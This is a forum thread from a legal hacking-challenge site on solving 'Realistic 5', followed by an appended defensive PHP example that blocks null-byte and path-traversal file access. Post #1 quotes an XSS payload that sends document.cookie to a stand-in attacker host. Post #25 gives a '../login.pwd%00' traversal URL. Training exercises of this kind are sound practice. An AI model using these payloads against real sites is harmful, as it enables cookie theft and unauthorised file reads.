ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.


#1 2009-06-10 02:03:03

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Realistic 5

Hello guys (t0mmy9 and sOwl)

While I was trying to solve this challenge, I tried some weird thing.

I entered this into the search box: "Nice Site,  I think I'll take it.><script>document.location='http://some_attacker/cookie.cgi?' +document.cookie</script


The result I got was pretty confusing. I don't know if this is a bug or something else or something that can really get your site hacked. Please help. And if it's a bug, please fix it before someone exploits it.

Here's the link to the page I got:

Gives away part of the challenge
xyberz09 :)

Offline

#2 2009-06-10 04:27:55

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

Thanks for reporting this, but this is an XSS prevention message. If you enter any form of HTML into the search box you get the

"Not Acceptable"

message. There is security to prevent XSS on the challenge already though, so it isn't even needed.


Site admin

Offline

#3 2009-06-10 08:12:36

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

Take a look at everything in the R5 site; you should be able to find the way.

[spoiler]You don't have to look in the source-code in this challenge[/spoiler]

Offline

#4 2009-06-12 00:37:13

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Realistic 5

Hmm, I found an admin login page but I'm not sure how to get inside. It says information doesn't match with this file: %6C%6F%67%69%6E%2E%70%77%64

I'm trying to find the location of this file but I'm not sure where it is.

PS: By the way, does this challenge have anything to do with NULL? Just wondering...

Offline

#5 2009-06-15 14:34:43

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

When a page is blank, it probably means that the file is forbidden. If it doesn't exist then you will get a "Page Not Found" error.

Anyway, the location of the file you are trying to view is obvious.

PS: If you mean the [spoiler]Null Byte[/spoiler] yes, but you don't need it where you think. You use it to access the file but something else in the site is needed.

[spoiler]The "something else" is the most important part, look carefully.[/spoiler]

Offline

#6 2009-07-12 10:35:47

simms
Member
Registered: 2009-07-12
Posts: 1

Re: Realistic 5

I've found the login page, and I've noticed the file I need to view BUT...

[spoiler]I'm not sure how to view it, I think I need to use a null byte somewhere to view it but I'm not sure where.[/spoiler]

Any help?

Thanks

Offline

#7 2009-07-13 06:52:59

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

You may not be able to view it directly, but... what if you force the server to do it for you?

Your final mission on this challenge is to search the site for this kind of vulnerability.

Offline

#8 2009-09-30 03:09:59

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Realistic 5

I get a 403 Forbidden when trying to access login.pwd
I'm stumped. How do you access a file that you've denied permission?

I searched a little on Google but didn't find anything helpful. Any hints?

Offline

#9 2009-10-01 10:32:04

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

The file has been changed using Unix perms so that users can't view the file. The server can still view the file though, so for example... if the file was opened using a PHP file the permissions would allow the file to be read by the script.


Site admin

Offline

#10 2009-10-08 13:51:22

Timse
Member
Registered: 2009-02-08
Posts: 18

Re: Realistic 5

Does this have anything to do with
Admin Edit: Gives away a huge part of the challenge.

Offline

#11 2009-10-08 14:00:02

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

Yes it does. You're almost done, good job :)
Now find how you can use it.

Offline

#12 2009-10-09 14:01:28

Timse
Member
Registered: 2009-02-08
Posts: 18

Re: Realistic 5

Sorry t0mmy9. Good that you edited my post.

Offline

#13 2009-11-06 00:33:29

xipander
Member
Registered: 2009-11-06
Posts: 1

Re: Realistic 5

I'm stuck on this one too.  Been at it forever.

I know the file I need to view.
I know the method/vulnerability I'm supposed to use.
I know of two places on the site that it'd be possible to use it. (one more so than the other)

I just can't figure out what I'm doing wrong.  I'm pretty positive I'm on the right track but I can't figure out what I'm missing.  Is there anyone I can pm or that can pm me to help with it?

Offline

#14 2009-11-06 02:02:50

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

Actually I edited your post :D
BTW xipander, you can PM me.

Offline

#15 2009-12-28 09:04:56

therock_wall
Member
Registered: 2008-03-16
Posts: 45

Re: Realistic 5

Hi all, I found the secret login page and also the file. I also know that there is some UNIX file permission problem and that I need to use a NULL byte, but how do I write the code? I read the tutorial on this site. So do I need to download the page and write the code, or...?
How do I go ahead?

Offline

#16 2010-01-01 05:59:17

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

If you have found the right page, then you should be able to do this from your browser by adding it to the correct URL.


Site admin

Offline

#17 2010-01-01 20:20:22

therock_wall
Member
Registered: 2008-03-16
Posts: 45

Re: Realistic 5

OK, I got the page and the file, and when I try I see a blank page. So how do I move further? How do I view the file? I know some null byte stuff, but how do I inject the null byte into this? Please, some hint to move ahead.

Offline

#18 2010-01-03 03:05:25

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

You must find something in the site that looks able to inject a Null Byte (just by looking at it).

So don't overthink this or look very hard.

Offline

#19 2010-03-31 12:57:16

xen
Member
Registered: 2010-03-14
Posts: 35

Re: Realistic 5

I got what I need but my friend john is just sat looking at me shaking his head with his arms crossed.

Offline

#20 2010-03-31 13:17:57

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Realistic 5

@xen, look closely at the last 2 chars,

john can't help you here.

Offline

#21 2010-06-07 06:36:36

brahim
Member
Registered: 2010-06-07
Posts: 1

Re: Realistic 5

I tried many combinations using null bytes but none of them works. I do not have any clue on how it's coded. May I have a little hint please?

Offline

#22 2010-06-07 07:38:50

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

Have you found the right page? Or do you just "Null Byte" the pwd file?

It won't work unless you've found the injectable looking page.

Offline

#24 2010-06-16 03:15:06

Null Set
Member
Registered: 2010-06-14
Posts: 23

Re: Realistic 5

BuRNeD, post #2, you lie. :) haha


Null Set

Offline

#25 2011-02-21 18:31:55

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

http://thisislegal.com/nc/details.php?p=../login.pwd%00
Why doesn't this work? function pup(img) should open the file, should it not??

Offline
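Added example, not part of the thread and not the challenge site's code: posts #9 and #25 describe a script that reads a file named by a request parameter, which bypasses the web server's own deny rule for that file. A hardened resolver for such a parameter, run against constructed inputs, looks like this; `resolve_page`, the sandbox directory and the extension allowlist are hypothetical.

```php
<?php
// Added example: hypothetical hardened resolver for a user-supplied file
// parameter (e.g. ?p=...). Not the challenge site's code.

function resolve_page(string $param, string $baseDir, array $allowedExt): ?string
{
    // 1. A NUL byte never belongs in a file name: reject, do not strip.
    if ($param === '' || strpos($param, "\0") !== false) {
        return null;
    }
    // 2. Canonicalise both paths; realpath() resolves ../ and symlinks
    //    and returns false when the target does not exist.
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $param);
    if ($base === false || $target === false) {
        return null;
    }
    // 3. The canonical target must stay inside the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // 4. Check the extension on the canonical path, not on the raw input.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    if (!is_file($target) || !in_array($ext, $allowedExt, true)) {
        return null;
    }
    return $target;
}

// Constructed sandbox: a public pages/ directory with a secret beside it.
$root = sys_get_temp_dir() . '/r5demo_' . bin2hex(random_bytes(4));
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/about.html", 'about');
file_put_contents("$root/login.pwd", 'constructed secret');

// Constructed inputs, as they would look after URL decoding (%00 -> "\0").
$inputs = ['about.html', '../login.pwd', "../login.pwd\0",
           "../login.pwd\0.html", 'missing.html'];
foreach ($inputs as $p) {
    $ok = resolve_page($p, "$root/pages", ['html', 'txt']) !== null;
    printf("%-22s => %s\n", addcslashes($p, "\0"), $ok ? 'served' : 'rejected');
}
```

PHP has rejected NUL bytes in filesystem paths since 5.3.4, so the explicit NUL check is defence in depth; the containment check in step 3 is what stops `../` from reaching a file outside the served directory.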
